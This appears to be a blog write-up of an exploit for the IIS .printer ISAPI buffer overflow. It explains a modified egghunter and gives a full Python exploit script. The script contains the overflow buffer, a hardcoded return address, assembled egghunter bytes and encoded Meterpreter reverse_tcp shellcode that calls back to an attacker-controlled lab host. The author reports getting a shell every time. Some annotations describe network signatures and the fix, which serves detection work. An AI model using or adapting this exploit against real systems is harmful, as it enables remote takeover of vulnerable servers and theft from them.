After breaking out Immunity Debugger it became clear why the exploit did not work every time. According to the Metasploit module, the shellcode is held at an offset from EBX, and a short assembly stub jumps to that location (see the Metasploit snippet below).
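# Excerpt from the Metasploit module: builds the value that goes in the
# host part of the request URL, then sends the request.
buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V') # target.ret written as a little-endian dword at offset 268

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

# The payload itself travels in the query string of the .printer request.
sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")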
While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know roughly where in memory our payload will be when we gain control of EIP, this seems like a good place to use an egghunter :) I started out with an existing egghunter (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little: since I know roughly where in memory my payload is, there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -
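# Egghunter listing, trimmed to search forward from EBX only.
mov edx, ebx                # ebx is the area of our starting point
or dx, 0fff
xor dx, 0fff                # or + xor together clear the low 12 bits of edx for the start of our loop
inc edx                     # increment edx - this is the start of our loop
nop                         # abbreviated nops where the original access violation check was;
                            # without that check, a read of an unmapped page faults in the target process
# ...                       # (remaining nops not shown)
mov eax, 57303054           # load our egg "W00T"
mov edi, edx                # set edi to point at our current location in memory
scas dword ptr es:[edi]     # compare our egg to dword at edi
jnz                         # jump back to the start of our loop (inc edx) if we didnt find the egg
scas dword ptr es:[edi]     # compare our egg to the next dword for the 2nd part of the egg
jnz                         # jump back to the start of our loop (inc edx) if we didnt find the 2nd egg
jmp edi                     # jump to edi as it points to the first byte after our egg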
After implementing the egghunter in the exploit I had no issues getting a shell every time :)
Full exploit below - obviously you will have to change the shellcode for it to work for you -
import urllib2
import sys
# Payload string. It is appended to the query string of the request built at
# the end of the script. It opens with the 4-byte marker "T00W" written twice;
# those are the bytes of the dword 0x57303054 that the egghunter stub loads
# and compares against two consecutive dwords.
shell= "T00WT00W"
# Ten NOP bytes between the marker and the encoded payload.
shell +="\x90"*(10)
########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
# Output of the command in the banner above. Per that banner the callback
# address is the author's lab host, which is why the post says the shellcode
# has to be regenerated. After a short non-alphanumeric prefix the bytes are
# upper-case letters and digits (the alpha_upper encoding), so on the wire
# this is a very long alphanumeric query string on a .printer URL.
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")
# Assembled form of the egghunter listed earlier in the post: copy EBX to EDX,
# clear EDX's low 12 bits, then step forward one byte at a time comparing two
# consecutive dwords with 0x57303054 and jump to the byte after the second
# match. The run of \x90 sits where the original hunter's access-violation
# check was.
egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
# Host header value: 268 filler bytes, a 4-byte value at offset 268 (the slot
# the Metasploit snippet fills with target.ret), 5 NOPs, the egghunter, then
# 156 NOPs.
# NOTE(review): the 4-byte value looks like an absolute address tied to one
# OS/DLL build; the post does not say which -- confirm before relying on it
# for anything, including signatures.
buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
# The oversized buffer is sent as the Host header rather than in the URL.
header = {'User-Agent':useragent, 'Host':buff}
# GET /NULL.printer?<payload> against the host given as argv[1] (urllib2, so
# Python 2 only; argv is not checked). What a defender sees on the wire is a
# request for a .printer resource whose Host header is hundreds of bytes long
# and contains non-printable bytes, plus a very long query string starting
# with "T00WT00W". Removing the .printer script mapping or applying the
# vendor fix for this overflow closes the code path this request reaches.
req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()